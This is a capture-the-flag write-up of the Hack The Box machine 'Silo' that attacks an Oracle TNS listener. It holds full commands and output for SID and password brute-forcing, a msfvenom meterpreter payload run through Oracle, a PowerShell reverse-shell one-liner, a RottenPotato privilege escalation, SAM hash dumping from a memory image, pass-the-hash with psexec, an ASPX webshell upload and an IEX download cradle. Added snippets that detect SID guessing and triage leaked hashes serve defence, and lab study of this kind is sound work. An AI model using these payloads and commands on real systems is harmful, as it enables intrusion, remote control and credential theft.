This machine involves an Oracle database, which I had never dealt with before, so I took the opportunity to get familiar with how to work with this database. The same goes for memory forensics: I had only just got to know Forensics Master at the last Meiya Cup, so I also used this box to learn the relevant forensics knowledge.
Reconnaissance
nmap -sC -sV 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.073s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-09T05:17:36
|_  start_date: 2021-02-09T03:07:49

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds
Port 80 is open and runs IIS 8.5. A search turned up no exploitable vulnerabilities for it, so it is most likely a rabbit hole.
Port 135 and the five-digit ports are RPC, and there are no exploitable vulnerabilities there either.
rpcclient -U '' 10.10.10.82
Enter WORKGROUP\'s password:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Ports 139 and 445 let us identify the target's operating system, but there is nothing in the shared folders:
$ smbclient -L //$ip/
Enter WORKGROUP\chris's password:
session setup failed: NT_STATUS_ACCESS_DENIED

┌─[root@kali]─[~]
└──╼ $ smbmap -H $ip
[!] 445 not open on 10.10.10.82....
Port 1521 is the Oracle TNS listener, the listening port of the Oracle database, and this is where the exploitable weakness lies.
Getting SYSTEM privileges
Method 1
This method does not require access to www.
First install odat: simply type odat in Kali and the installation starts automatically.
Then start using it:
~ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                              ########## | ETA:  00:00:01
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################| Time: 00:02:22
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################| Time: 00:00:05
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...                              #### | ETA:  00:00:15
100% |#######################################################| Time: 00:02:22
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
Two valid SIDs are found; after testing, XE is the usable one.
msf can likewise be used to guess the SID at this step: use scanner/oracle/sid_enum, and remember to switch to a bigger dictionary:
"/usr/share/metasploit-framework/data/wordlists/sid.txt"
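From the defender's side, a SID guess like the one above leaves a clear trace: every unknown SID produces a TNS-12505 "establish" record in the listener's listener.log. The following is an added example, not code from the box or from odat, that parses such records and flags any client host that asked for several different unknown SIDs; the log lines are constructed and the threshold of three distinct SIDs is an assumption.

```python
import re
from collections import defaultdict

# Constructed Oracle listener.log excerpt (not from the box). Each "establish"
# record ends with "<requested SID> * <return code>": 0 means the listener handed
# the connection to an instance, 12505 (TNS-12505) means it did not know the SID,
# which is the error a SID guesser produces in bulk. Real logs add an indented
# "TNS-12505: ..." continuation line after such records, shown once here.
SAMPLE_LOG = """\
09-FEB-2021 13:20:01 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=51240)) * establish * XE * 0
09-FEB-2021 13:20:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=40001)) * establish * ORCL * 12505
 TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
09-FEB-2021 13:20:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=40002)) * establish * PROD * 12505
09-FEB-2021 13:20:03 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=40003)) * establish * TEST * 12505
09-FEB-2021 13:20:04 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=40004)) * establish * XE * 0
09-FEB-2021 13:21:10 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=dev02)(USER=alice))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.60)(PORT=52011)) * establish * XEE * 12505
"""

# requested SID (or service name), client address and final TNS return code
LINE_RE = re.compile(
    r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=(?P<sid>[^)]*)\).*?"
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\)"
    r" \* establish \* [^*]* \* (?P<code>\d+)\s*$"
)


def parse_establish(lines):
    """Yield (client_host, requested_sid, return_code) for each establish record."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:  # continuation lines such as " TNS-12505: ..." do not match
            yield m.group("host"), m.group("sid"), int(m.group("code"))


def find_sid_guessing(lines, min_unknown_sids=3):
    """Map client host -> sorted distinct SIDs it requested that the listener
    rejected with TNS-12505, keeping only hosts at or above the threshold.
    A single typo (one unknown SID from one host) stays below it."""
    unknown = defaultdict(set)
    for host, sid, code in parse_establish(lines):
        if code == 12505:
            unknown[host].add(sid)
    return {h: sorted(s) for h, s in unknown.items() if len(s) >= min_unknown_sids}
```

On a real listener the same records come from $ORACLE_BASE/diag/tnslsnr/<host>/listener/trace/listener.log (or alert/log.xml), so the function can be pointed at that file's lines directly.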
Password guessing
Next, the username and password:
➜  ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt
[+] Valid credentials found: scott/tiger. Continue...
I later came across another way of using odat.
I will study it and explain it in detail in a separate article on odat.
odat all -s 10.10.10.82 -p 1521 -d XE
--snipped--
[+] Valid credentials found: scott/tiger. Continue...
--snipped--
0xdf also wrote his own script to brute-force the password: HTB: Silo | 0xdf hacks stuff
#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool

MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"


def usage():
    print("{} [ip] [wordlist]".format(sys.argv[0]))
    print("    wordlist should be of the format [username]:[password]")
    sys.exit(1)


def scan(userpass):
    # one connection attempt per "user:pass" line; cx_Oracle raises
    # DatabaseError (ORA-01017) when the credentials are rejected
    u, p = userpass.split(':')[:2]
    try:
        conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
        conn.close()
        return u, p, True
    except cx_Oracle.DatabaseError:
        return u, p, False


def main(target, userpassfile, nprocs=MAX_PROC):
    # the [ip] argument must land in the module-level host that scan() reads;
    # a parameter of the same name would only shadow it and leave the
    # hard-coded default in use
    global host
    host = target
    with open(userpassfile, 'r') as f:
        userpass = f.read().rstrip().replace('\r', '').split('\n')
    pool = Pool(processes=nprocs)
    for username, pass_, status in pool.imap_unordered(scan, userpass):
        if status:
            print("Found {} / {}\n\n".format(username, pass_))
        else:
            sys.stdout.write("\r {}/{}     ".format(username, pass_))


if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
    main(sys.argv[1], sys.argv[2])
There is nothing of interest in the database, so here we upload a malicious file and execute it:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe
odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe
odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe
Remember to start the msf listener before executing the script:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
lhost => 10.10.16.7
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.7:4445
[*] Sending stage (200262 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800
Done.
Method 2
Read files directly with odat:
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt

[1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server
[+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'):
82FDAB14799E467FCE23979F9C1BF92C
Method 3
Thanks to 0xdf for the idea.
When whoami /priv under a low-privileged account shows SeImpersonatePrivilege, we know RottenPotato can be used to escalate privileges:
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
Download MSFRottenPotato.exe: GitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
Then write a bat file:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
Then download both to the target:
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
Then run the script:
PS C:\temp> c:\temp\lp.exe * \temp\rev.bat
connect sock
CreateIlok: 0 0
start RPC connection
CreateDoc: 0 0
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 132
COM -> bytes sent: 132
COM -> bytes received: 127
RPC -> bytes Sent: 127
RPC -> bytes received: 196
COM -> bytes sent: 196
COM -> bytes received: 243
RPC -> bytes Sent: 243
RPC -> bytes received: 192
COM -> bytes sent: 192
COM -> bytes received: 72
RPC -> bytes Sent: 72
RPC -> bytes received: 60
COM -> bytes sent: 60
COM -> bytes received: 42
RPC -> bytes Sent: 42
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token tye:2
[+] DuplicateTokenEx :1 0
[+] Duped Token type:1
[+] Running \temp\rev.bat sessionId 1
[+] CreateProcessWithTokenW OK
Auth result: 0
Return code: 0
Last error: 0
Remember to have the nc listener running first:
root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085
listening on [any] 8085 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181
PS C:\Windows\system32> whoami
nt authority\system
Method 4
On the user's desktop we find not only the flag but also an "Oracle issue.txt" file:
dir \users\Phineas\Desktop

    Directory: C:\users\Phineas\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---         1/5/2018  10:56 PM            300 Oracle issue.txt
-a---         1/4/2018   9:41 PM             32 user.txt
Opening it, I found that the file says a full memory dump was stored on a file-sharing service, and the password is in there as well:
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$
Download the dump and try memory forensics with volatility, first identifying the profile with kdbgscan:
volatility kdbgscan -f SILO-20180105-221806.dmp
**************************************************
Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)
Offset (V)                    : 0xf80078520a30
Offset (P)                    : 0x2320a30
KdCopyDataBlock (V)           : 0xf8007845f9b0
Block encoded                 : Yes
Wait never                    : 0xd08e8400bd4a143a
Wait always                   : 0x17a949efd11db80
KDBG owner tag check          : True
Profile suggestion (KDBGHeader): Win2012R2x64_18340
Version64                     : 0xf80078520d90 (Major: 15, Minor: 9600)
Service Pack (CmNtCSDVersion) : 0
Build string (NtBuildLab)     : 9600.16384.amd64fre.winblue_rtm.
PsActiveProcessHead           : 0xfffff80078537700 (51 processes)
PsLoadedModuleList            : 0xfffff800785519b0 (148 modules)
KernelBase                    : 0xfffff8007828a000 (Matches MZ: True)
Major (OptionalHeader)        : 6
Minor (OptionalHeader)        : 3
KPCR                          : 0xfffff8007857b000 (CPU 0)
KPCR                          : 0xffffd000207e8000 (CPU 1)
**************************************************
...
Then try to dump the account hashes: hivelist gives the virtual offsets of the SYSTEM and SAM hives, which hashdump needs as -y and -s.
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat

root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
Finally, log in with psexec using the hash (pass-the-hash):
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file XryxqKFr.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service PAYb on 10.10.10.82.....
[*] Starting service PAYb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
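The lesson of Method 4 is that a memory dump handed to a third party carries the SAM hashes, and hashes alone are enough for pass-the-hash. As an added example (not from the box or from volatility), here is a small triage of hashdump output an incident responder could run on a leaked dump to see what it exposes: blank passwords, LM hashes still stored, the RID-500 account, and password reuse across accounts. The first three lines are the ones dumped above; the svc_backup line is constructed to exercise the LM and reuse checks.

```python
import re

# volatility hashdump (pwdump) format: user:RID:LM hash:NT hash:::
# First three lines from the dump above; svc_backup is a constructed extra.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
svc_backup:1003:e52cac67419a9a224a3b108f3fa6cb6d:9e730375b7cbcebf74ae46481e07b0c7:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of "" : LM storage disabled (normal today)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)


def parse_pwdump(text):
    """Return one dict per well-formed hashdump line; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries


def triage(entries):
    """Map user -> list of findings about what the leaked hash exposes."""
    findings = {}
    first_user_with_nt = {}  # NT hash -> first account seen with it
    for e in entries:
        notes = []
        if e["nt"] == EMPTY_NT:
            notes.append("blank password")
        if e["lm"] != EMPTY_LM:
            notes.append("LM hash stored: LM compatibility still enabled, trivially crackable")
        if e["rid"] == 500:
            notes.append("built-in Administrator: NT hash alone allows pass-the-hash, rotate it")
        if e["nt"] in first_user_with_nt:
            notes.append("same password as " + first_user_with_nt[e["nt"]])
        else:
            first_user_with_nt[e["nt"]] = e["user"]
        if notes:
            findings[e["user"]] = notes
    return findings
```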
Post-exploitation
Because I went straight to the odat script, I never even obtained the database account and password during the exploitation. While organizing my notes I looked at other people's approaches and put together the steps for logging in to the database (I had not even installed Oracle on my machine, and installing the database later was really painful).
Database exploration
In HTB: Silo - PurpleRabbit, the author explains how to log in using only sqlplus, without installing the Oracle database. I'll write that method down here first:
sqlplus scott/tiger@$10.10.10.84:1521/XE

SQL> select table_name from user_tables;

TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
Nothing of interest was found in this database.
Access to www
The idea comes from 0xdf.
Using odat's dbmsadvisor module:
root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx

[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)
This uploads a web command-execution script, which we then run commands through via the IIS 8.5 site found earlier.
Then we use that command line to download our reverse shell script.
Start a web server locally:
python -m SimpleHTTPServer 80
Then on the command line:
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')
And we get a reverse shell.